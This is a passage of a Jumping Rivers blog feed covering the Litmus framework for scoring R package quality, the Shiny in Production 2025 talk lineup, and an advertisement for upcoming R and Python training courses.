&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;As is often the case, it&amp;rsquo;s pretty easy to talk about “good” R packages.
We can even wave our hands and talk about packages following “software standards” or “best practices”. But what does that mean?&lt;/p&gt;
&lt;p&gt;Most of us would agree that packages like &lt;code&gt;{Rcpp}&lt;/code&gt; or &lt;code&gt;{dplyr}&lt;/code&gt; are solid.
At the other end of the spectrum, we could point to outdated, poorly tested or unmaintained packages as &amp;ldquo;risky&amp;rdquo;.
But the reality is that most R packages fall somewhere in between.&lt;/p&gt;
&lt;p&gt;However, the reality is considerably more nuanced: the vast majority of R packages exist somewhere along the continuum between these two extremes.
They may exhibit excellence in certain aspects whilst falling short in others, or they might represent perfectly adequate solutions for specific use cases whilst being unsuitable for mission-critical applications.
The primary objective of this post is to assist organisations and individual practitioners in developing a clearer, more systematic understanding of the packages upon which they depend.
It&amp;rsquo;s important to acknowledge upfront that any scoring system will have limitations—some genuinely high-quality packages might receive unexpectedly low scores due to specific circumstances, whilst some packages with significant underlying issues might score well on surface-level metrics.
However, this doesn&amp;rsquo;t diminish the considerable value of establishing a consistent, structured framework for package assessment.&lt;/p&gt;
&lt;p&gt;In developing &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmus&lt;/a&gt;, our solution for R package assessment and validation, we&amp;rsquo;ve had to wrestle with these concepts in great detail.
We have come up with a framework that we believe addresses the challenges presented by package validation.
In the coming series of Litmus blog posts, we will be examining in detail the choices we made to balance the need for both robustness and flexibility in R package quality assessment.&lt;/p&gt;
&lt;p&gt;Before examining the specifics of how we evaluate and score packages, it&amp;rsquo;s crucial to understand the foundational principles that underpin our methodology.
In this post, we will be digging into the core principles of our approach.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-scoring-r-validation"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="guideline-1-scores-are-not-static"&gt;Guideline 1: Scores are not static&lt;/h3&gt;
&lt;p&gt;At first glance, this principle might appear counterintuitive, but it reflects a fundamental reality: the standards we apply to R packages today cannot reasonably be identical to those we might have employed in 2015, nor should they remain unchanged looking forward to 2030.&lt;/p&gt;
&lt;p&gt;Consider the obvious evolution in scale: package download numbers have increased dramatically over the past decade, reflecting both the growth of the R community and the maturation of package distribution infrastructure. More subtly but equally importantly, the general tooling ecosystem has undergone dramatic improvements. Modern development practices now routinely include automated testing via GitHub Actions, comprehensive code coverage analysis, automated dependency checking, and sophisticated static analysis tools. Packages developed today have access to these resources in ways that simply weren&amp;rsquo;t feasible or standard practice a decade ago. Since &lt;em&gt;number of downloads&lt;/em&gt; represents a metric of package popularity, what is considered a high vs. low number of downloads will need to be periodically adjusted.&lt;/p&gt;
&lt;p&gt;Furthermore, our scoring approach is explicitly tied to specific package versions. When a maintainer releases a new version of a package, potentially addressing security vulnerabilities, improving documentation, adding new features, or enhancing test coverage, the previous version often becomes a less optimal choice despite having been perfectly adequate when it was current.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; We implement an annual comprehensive audit of our scoring mechanisms. This yearly review process serves multiple functions: updating the underlying data used to generate scores where relevant (such as adjusting download thresholds to reflect ecosystem growth), introducing new scoring criteria as best practices evolve, and retiring metrics that may have become less relevant or discriminatory.&lt;/p&gt;
&lt;h3 id="guideline-2-scores-shouldnt-change-often"&gt;Guideline 2: Scores shouldn&amp;rsquo;t change often&lt;/h3&gt;
&lt;p&gt;While we acknowledge that scores are transient, they shouldn&amp;rsquo;t change often or dramatically.
For example, it makes sense to yearly audit our scoring mechanism for downloads and adjust the criteria.
This would change scores on packages, but only in a small way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; We maintain disciplined annual audits of our scoring mechanisms, with changes implemented deliberately and with clear documentation of the rationale.
Between these annual reviews, scoring criteria remain stable unless critical issues are identified.&lt;/p&gt;
&lt;h3 id="guideline-3-cutoffs-depend-on-use-cases"&gt;Guideline 3: Cutoffs depend on use Cases&lt;/h3&gt;
&lt;p&gt;In an ideal world, we should “hand analyse” all packages, spending time assessing each package individually.
From a practical perspective, focusing our attention on the borderline packages, those that are almost good enough or &lt;em&gt;just&lt;/em&gt; good enough to make the cut, makes sense.
However, what constitutes &amp;ldquo;borderline&amp;rdquo; varies dramatically depending on the intended application.
A package being considered for use in a regulatory submission to the FDA faces entirely different quality requirements compared to one being used in an MSc Statistics project or an exploratory data analysis. The former context demands extensive validation, comprehensive documentation, and demonstrated stability, whilst the latter might reasonably accept some additional risk in exchange for cutting-edge functionality or convenience.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; Rather than imposing universal &amp;ldquo;risky&amp;rdquo; package thresholds, we advocate for situation-dependent cutoffs that reflect the specific requirements and risk tolerance of different use cases. We provide guidance for establishing appropriate thresholds for common scenarios whilst recognising that organisations may need to customise these based on their specific regulatory, commercial, or academic contexts.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;See our post on &lt;a href="https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/" rel="external"&gt;Risk Appetite&lt;/a&gt; for more on this.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="guideline-4-good-packages-may-have-serious-issues"&gt;Guideline 4: “Good” packages may have serious issues&lt;/h3&gt;
&lt;p&gt;It&amp;rsquo;s crucial to recognise that even the most well-regarded packages can face problems that lie entirely outside their maintainers&amp;rsquo; direct control. For example, a package might depend on a system library that subsequently reveals a security vulnerability, or one of its dependencies might become unmaintained. Alternatively, changes in the broader R ecosystem—such as modifications to base R or updates to critical dependencies—might create compatibility issues that haven&amp;rsquo;t yet been addressed.
These scenarios highlight why a single numerical score, whilst valuable for initial triage, cannot capture the full complexity of package risk assessment. Some issues represent genuine &amp;ldquo;showstoppers&amp;rdquo; that require immediate attention regardless of a package&amp;rsquo;s overall score.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; Whilst maintaining our commitment to clear, interpretable numerical scores for initial assessment, we supplement these with specific flags for &amp;ldquo;showstopper&amp;rdquo; issues that require immediate human review. These might include known security vulnerabilities, dependencies on risky packages, or compatibility issues with current R versions.&lt;/p&gt;
&lt;h3 id="guideline-5-avoid-cliff-edges"&gt;Guideline 5: Avoid cliff edges&lt;/h3&gt;
&lt;p&gt;Regardless of your statistical persuasion, we can all agree that having a super hard cut-off of “p = 0.05” is silly.
The idea that &amp;ldquo;p = 0.05000001&amp;rdquo; is “not significant”, but “p = 0.4999999” can change the world, doesn&amp;rsquo;t really make sense.
The same idea should apply to scores.
Where possible, the scoring mechanism should be smooth and continuous.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; We employ continuous, smooth scoring functions wherever possible. For example, rather than awarding full points for packages with &amp;gt;80% test coverage and zero points for those with &amp;lt;80%, we use gradual scoring curves that reward improvements at all levels whilst still recognising meaningful distinctions in quality.&lt;/p&gt;
&lt;h3 id="guideline-6-not-all-scores-are-created-equally"&gt;Guideline 6: Not all scores are created equally&lt;/h3&gt;
&lt;p&gt;A score based on whether or not there is a maintainer should count more towards an overall score than a score based on whether or not there is a website URL.
The former is more important than the latter in most cases, and thus should contribute more towards an overall score, if this overall score is to be considered useful.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; Creating a scoring strategy that weighs individual metrics sensibly within categories, which are also weighted to reflect their relative importance. We will discuss this strategy in more detail in a later blog post, but here is the general idea.&lt;/p&gt;
&lt;p&gt;We think of package quality as having four attributes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Documentation (weight 15%): Assess the quality and completeness of the package documentation.
This is clearly subjective, as a package with full documentation, could have “bad” or outdated documentation.
Nevertheless, packages that lack examples in their help pages, vignettes or NEWS files have lower scores.&lt;/li&gt;
&lt;li&gt;Code (weight 50%): This evaluates the quality and structure of the package code.
Key components of this score include package dependencies (always a controversial topic), the number of exported objects, vulnerabilities, and test coverage.&lt;/li&gt;
&lt;li&gt;Maintenance (weight 20%): Reviews standard maintenance aspects of the package, including frequency updates, bug management, and number of contributors.&lt;/li&gt;
&lt;li&gt;Popularity (weight 15%): Review the package&amp;rsquo;s popularity. This includes package downloads over the last year and reverse dependencies.
The idea is that these are strong indicators that the community has already placed trust in that package.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These numbers can of course be adjusted.&lt;/p&gt;
&lt;h2 id="implementation-considerations-and-future-development"&gt;Implementation Considerations and Future Development&lt;/h2&gt;
&lt;p&gt;This scoring framework represents an ongoing effort to bring greater systematisation and transparency to R package quality assessment. As the R ecosystem continues to evolve, we anticipate that both our methodology and our understanding of what constitutes package quality will require ongoing refinement.
We welcome feedback from the community about both the theoretical framework presented here and its practical implementation. Particular areas where community input would be valuable include the appropriate weightings for different quality attributes, the identification of additional metrics that might enhance assessment accuracy, and the development of context-specific guidance for different usage scenarios.
Our commitment to annual methodology review ensures that this framework will adapt to reflect changes in best practices, tooling availability, and community standards whilst maintaining the stability and predictability that users require for practical decision-making.&lt;/p&gt;
&lt;h2 id="get-in-touch"&gt;Get in Touch&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;re interested in learning more about R validation and how it can be used to unleash the power of open source in your organisation, &lt;a href="https://www.jumpingrivers.com/contact/?subject=Litmus" rel="external"&gt;contact us&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="references"&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/" rel="external"&gt;Risk Appetite&lt;/a&gt; in R packages&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pharmar.org/white-paper/" rel="external"&gt;White paper&lt;/a&gt; from the Validation Hub on assessing R package accuracy&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pharmar.org/categories/case-studies/" rel="external"&gt;Case Studies&lt;/a&gt; from various companies. Our approach builds on these ideas.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025: Full Length Talks</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/</link><pubDate>Tue, 17 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h4 a:after { content: unset; }
main h4 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;We are pleased to announce the full line-up for this year&amp;rsquo;s
&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference!
The conference includes nine full-length talks (25 minutes each) and a
lightning talk session (5 minutes per talk), we&amp;rsquo;ll cover those in a separate blog.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/"&gt;&lt;button class="buttony-link central-content" type="button"&gt;Register
now&lt;/button&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="talks"&gt;Talks&lt;/h3&gt;
&lt;h4 id="cameron-race---head-of-children-and-schools-statistics-and-product-manager"&gt;&lt;a href="https://www.linkedin.com/in/cam-race-a5048b106/" rel="external"&gt;Cameron Race&lt;/a&gt; - &lt;a href="https://www.gov.uk/government/organisations/department-for-education" rel="external"&gt;Head of Children and Schools Statistics and Product Manager&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;shinyGovstyle: A &amp;lsquo;Shiny&amp;rsquo; Secret Weapon for Production-Ready Government Public Services&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/cam-race@2x.jpg" alt="Photo of Cameron Race" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;In the UK, we are required to make public sector websites accessible to all users. While there is a wealth of UK government data publicly available through a number of existing digital services, it can be tough to engage with. Government analysts are increasingly turning to R Shiny to enhance their data dissemination, making it more
engaging for users, but with hundreds of analysts working in silos across government, how can analysts build full digital services in a way that carries the same consistency, trustworthiness and authority as a domain such as GOV.UK?&lt;/p&gt;
&lt;h4 id="charlie-gao---posit-software-pbc"&gt;&lt;a href="https://www.linkedin.com/in/charliegao/" rel="external"&gt;Charlie Gao&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit Software, PBC&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Advances in the Shiny Ecosystem&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/charlie-gao@2x.jpg" alt="Photo of Charlie Gao" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Charlie Gao, Senior Software Engineer on Posit’s open source team will review some of the latest high-performance async tooling developed by Posit to support R Shiny in terms of performance, scalability and user experience.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h4 id="colin-fay---thinkr"&gt;&lt;a href="https://bsky.app/profile/colinfay.bsky.social" rel="external"&gt;Colin Fay&lt;/a&gt; - &lt;a href="https://rtask.thinkr.fr/" rel="external"&gt;ThinkR&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;After {shiny} — Bringing R to Mobile with webR&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/colin-fay@2x.jpg" alt="Photo of Colin Fay" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;As the use of mobile devices becomes increasingly central to how users interact with data products, the R community has long sought ways to bring R-powered applications into the mobile space. Historically, this has meant adapting {shiny} apps for smaller screens—either through responsive design or packages like {shinyMobile}. While effective for certain use cases, these approaches are fundamentally web-based, requiring a server and a stable internet connection, and lacking access to native device features.&lt;/p&gt;
&lt;p&gt;This talk presents a new path forward: Rlinguo, a fully native mobile application built with webR, a version of R compiled to WebAssembly. Unlike traditional {shiny}-based solutions, Rlinguo runs R directly on the device, without a server. It works offline, stores data locally, and can leverage native mobile APIs—pushing the boundaries of what’s possible with R in a mobile context.&lt;/p&gt;
&lt;p&gt;Through this case study, we’ll explore the architecture behind Rlinguo, contrast it with the {shiny} model, and discuss what it means for the future of R development. Topics will include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;What it takes to embed R in a mobile app using webR&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Technical and design trade-offs between web-based and native solutions&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Practical applications for offline, device-integrated R tools&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Whether you&amp;rsquo;re building with {shiny} today or simply curious about the next evolution of R in production, this session offers a look at where R can go when it steps beyond the browser.&lt;/p&gt;
&lt;h4 id="gabriela-de-lima-marin---brazilian-network-information-centre"&gt;&lt;a href="https://www.linkedin.com/in/gabriela-de-lima-marin/" rel="external"&gt;Gabriela De Lima Marin&lt;/a&gt; - &lt;a href="https://www.nic.br/who-we-are/" rel="external"&gt;Brazilian Network Information Centre&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;A Collaborative Initiative for Mapping and Georeferencing Public Schools in Brazil&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/gabriela-lima@2x.jpg" alt="Photo of Gabriela De Lima Marin" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;This project presents a collaborative initiative aimed at improving the geolocation accuracy of Brazilian public schools through an interactive Shiny web application.&lt;/p&gt;
&lt;p&gt;By integrating existing location data from the Brazilian School Census with APIs from Google, Microsoft, and OpenStreetMap, we established an innovative workflow to assign accurate geographic coordinates to schools previously lacking precise location data.&lt;/p&gt;
&lt;p&gt;The Shiny application provides a user-friendly interface allowing school administrators and education managers to visually verify and manually adjust school locations via interactive maps. Over the past two years, this approach enabled the precise geolocation of previously unlocated schools and significantly enhanced the accuracy of geolocation data of schools.&lt;/p&gt;
&lt;p&gt;The geolocation data collected and validated through this project will be openly shared with relevant governmental stakeholders, promoting transparency and supporting evidence-based decision-making. Moreover, the project exemplifies how collaborative data science and innovative web technology—particularly R Shiny—can be effectively leveraged in public administration, enabling managers, stakeholders, and the community to directly contribute to data accuracy and positively influence educational outcomes in Brazil.&lt;/p&gt;
&lt;h4 id="jack-anderson---national-disease-registration-service-nhs-england"&gt;&lt;a href="www.linkedin.com/in/jack-anderson-bb1160178"&gt;Jack Anderson&lt;/a&gt; - &lt;a href="https://digital.nhs.uk/about-nhs-digital/corporate-information-and-documents/directions-and-data-provision-notices/data-provision-notices-dpns/national-disease-registration-service" rel="external"&gt;National Disease Registration Service, NHS England&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Transforming the reporting of national patient outcomes with Shiny: 30-day mortality post-Systemic Anti-Cancer Therapy&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/jack-anderson.jpg" alt="Photo of Jack Anderson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;In June 2020, the National Disease Registration Service began reporting 30-day mortality post-Systemic Anti-Cancer Therapy (SACT) Case-Mix Adjusted Rates (CMAR) to NHS trusts in England.
This work applies logistic regression to report trust-level case-mix adjusted 30-day mortality rates, which enable comparisons between trusts and with the national average. Historically, results were shared as an Excel workbook with an accompanying companion brief and FAQ document, and each report was shared in
isolation from previous releases. Since April 2023, implementation of R Shiny has enabled 30-day mortality rates to be reported seamlessly on an interactive, publicly accessible dashboard. Utilising
the Plotly and DT packages, dynamic funnel plots and data tables are tailored to user needs through
Shiny input pickers, which reactively subset and summarise data visualisations based on user selections.&lt;/p&gt;
&lt;p&gt;This enables NHS trust users to flexibly review their 30-day mortality outcomes against those of other trusts, their wider Cancer Alliance, and national averages, both overall and stratified by key patient
demographics.&lt;/p&gt;
&lt;p&gt;The Shiny dashboard also enables users to view current and previous CMAR reports together in one place and includes download button functionality for documentation and underlying data.
With dedicated tabs for summary data, trust exclusions, and trust response statements, Shiny allows for end-to-end exploration of CMAR outcomes, making it easier for users to gain insight into clinical practice.
The resulting Shiny dashboard supports clinical governance within trusts and enables clinical colleagues to better understand their patient outcomes within their wider context.&lt;/p&gt;
&lt;h4 id="laura-mawer--marcus-palmer---datacove-harrison-palmer-limited"&gt;&lt;a href="https://www.linkedin.com/in/lauramawer2/" rel="external"&gt;Laura Mawer&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/marcus-palmer-9ba93338/" rel="external"&gt;Marcus Palmer&lt;/a&gt; - &lt;a href="https://datacove.co.uk/" rel="external"&gt;Datacove&lt;/a&gt;, Harrison-Palmer Limited&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Using Shiny for Python to Power AI-Driven University Application Forecasting&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/laura-mawer@2x.jpg" alt="Photo of Laura Mawer" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;img src="images/marcus-palmer@2x.jpg" alt="Photo of Marcus Palmer" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Universities face growing uncertainty in student recruitment, making accurate forecasting critical for strategic and financial planning. Athena is an AI-powered prediction tool that leverages Shiny for Python to provide real-time insights into application trends. By combining machine learning (Random Forest models), trend analysis, and interactive scenario planning, Athena enables universities to test recruitment strategies, adjust campaign spending, and instantly see the projected impact on future application numbers.&lt;/p&gt;
&lt;p&gt;This talk will explore how Shiny for Python was used to develop a fully interactive forecasting tool without requiring extensive front-end development. We will discuss why Shiny for Python was chosen, how it integrates with a machine learning pipeline, and how it powers real-time scenario analysis with dynamic dashboards. Additionally, we’ll demonstrate how AI-generated recommendations via an API enhance decision-making, providing actionable insights tailored to user-selected scenarios.&lt;/p&gt;
&lt;p&gt;Attendees will gain practical knowledge on building AI-driven, interactive applications using Shiny for Python, implementing predictive models, and designing intuitive decision-support tools for non-technical users. The session will conclude with a live demo, showing Athena in action and sharing best practices for deploying Shiny for Python in production. This talk is designed for developers, data scientists, engineers, and senior decision-makers looking to leverage AI-powered forecasting, business intelligence, and strategic planning in a real-world application.&lt;/p&gt;
&lt;h4 id="nic-crane---nc-data-labs"&gt;&lt;a href="https://www.linkedin.com/in/niccrane/" rel="external"&gt;Nic Crane&lt;/a&gt; - &lt;a href=""&gt;NC Data Labs&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;htmlwidgets Are a Secret Sauce in R – Can LLMs Make Them the Perfect Condiment?&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/nic-crane@2x.jpg" alt="Photo of Nic Crane" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;htmlwidgets quietly power some of the most compelling Shiny apps out there,
but writing them from scratch can be fiddly and time-consuming. In this talk,
we&amp;rsquo;ll kick things off by taking an audience-sourced ingredient list and asking
a large language model to whip up a fresh htmlwidget. Then we&amp;rsquo;ll plate up a version
we prepared earlier - also model-generated - but chopped, seasoned, and finished with
our own touches. Along the way, we&amp;rsquo;ll explore how LLMs can assist in crafting htmlwidgets
that reflect your flavour of R - from tidy eval to package structure - rather than sticking
to a bland house style.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2025-full-lineup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why JR’s Training is Different</title><link>https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/</link><pubDate>Mon, 09 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-train-with-jr-2025-r-python-bayesian-statistics-machine-learning/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we believe training should be more than just a tick-box exercise. It should be transformative. Whether you’re learning R, Python, SQL, Git or Posit for the first time or diving into advanced topics like machine learning and Quarto, our courses are built to help you actually use what you learn — not just watch someone code. View our upcoming catalogue &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;here&lt;/a&gt;!&lt;/p&gt;
&lt;h2 id="what-sets-us-apart"&gt;What Sets Us Apart?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Expert Trainers&lt;/strong&gt;: Our trainers aren’t just good with code —
they’re professional data scientists who solve real-world problems for industry clients every day.
From building dashboards to optimising machine learning models, they bring this experience straight into the classroom.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;High-Quality Content&lt;/strong&gt;: We regularly update our material to reflect the latest best practices, tools, and workflows.
No tired examples. No generic slides. Just practical, polished, and engaging content that’s been road-tested across sectors.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Hands-On and Practical&lt;/strong&gt;: Expect live coding, interactive exercises, and the space to ask questions.
You’ll finish the course with code you wrote and skills you can apply immediately.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tailored for You&lt;/strong&gt;: We design our sessions around your level, your pace, and your goals.
Whether you’re an academic, analyst, developer, or decision-maker, you’ll get value from day one.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="what-people-are-saying"&gt;What People Are Saying&lt;/h2&gt;
&lt;p&gt;&amp;ldquo;Genuinely one of the best courses I’ve attended — well-paced, friendly, and full of real-world examples.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;The trainer was fantastic — incredibly knowledgeable and approachable. I finally feel confident using Git and R together.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;I loved how applied it all was. We weren’t just learning syntax — we were solving actual problems.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;Great value. I’ve already used what I learned in a project at work.&amp;rdquo;&lt;/p&gt;
&lt;h2 id="upcoming-live-training-with-super-early-bird-tickets-"&gt;Upcoming Live Training (with Super Early Bird Tickets 🎉)&lt;/h2&gt;
&lt;p&gt;Here are all the upcoming courses for July and August. Please note all times are UK time.&lt;/p&gt;
&lt;h3 id="7-8th-july"&gt;7-8th July&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;h3 id="1415-july"&gt;14–15 July&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web" rel="external"&gt;Introduction to Shiny&lt;/a&gt; - 13:30PM–17:00PM&lt;/p&gt;
&lt;h3 id="2122-july"&gt;21–22 July&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals" rel="external"&gt;Programming with R&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database" rel="external"&gt;Introduction to SQL&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;h3 id="2829-july"&gt;28–29 July&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt; - 13:30PM–17:00PM&lt;/p&gt;
&lt;h3 id="1112-august"&gt;11–12 August&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation" rel="external"&gt;Introduction to Python&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering" rel="external"&gt;Statistical Modeling with R&lt;/a&gt; - 13:30PM–17:00PM&lt;/p&gt;
&lt;h3 id="1819-august"&gt;18–19 August&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions" rel="external"&gt;Programming with Python&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt; - 13:30PM–17:00PM&lt;/p&gt;
&lt;h3 id="2021-august"&gt;20–21 August&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation" rel="external"&gt;Data Visualisation with Python&lt;/a&gt; - 09:00AM-12:30PM&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt; - 13:30PM–17:00PM&lt;/p&gt;
&lt;h2 id="ready-to-skill-up"&gt;Ready to Skill Up?&lt;/h2&gt;
&lt;p&gt;✅ Small class sizes&lt;/p&gt;
&lt;p&gt;✅ Live sessions with expert trainers&lt;/p&gt;
&lt;p&gt;✅ Immediate impact on your day-to-day work&lt;/p&gt;
&lt;p&gt;✅ Super early bird tickets — limited and going fast!&lt;/p&gt;
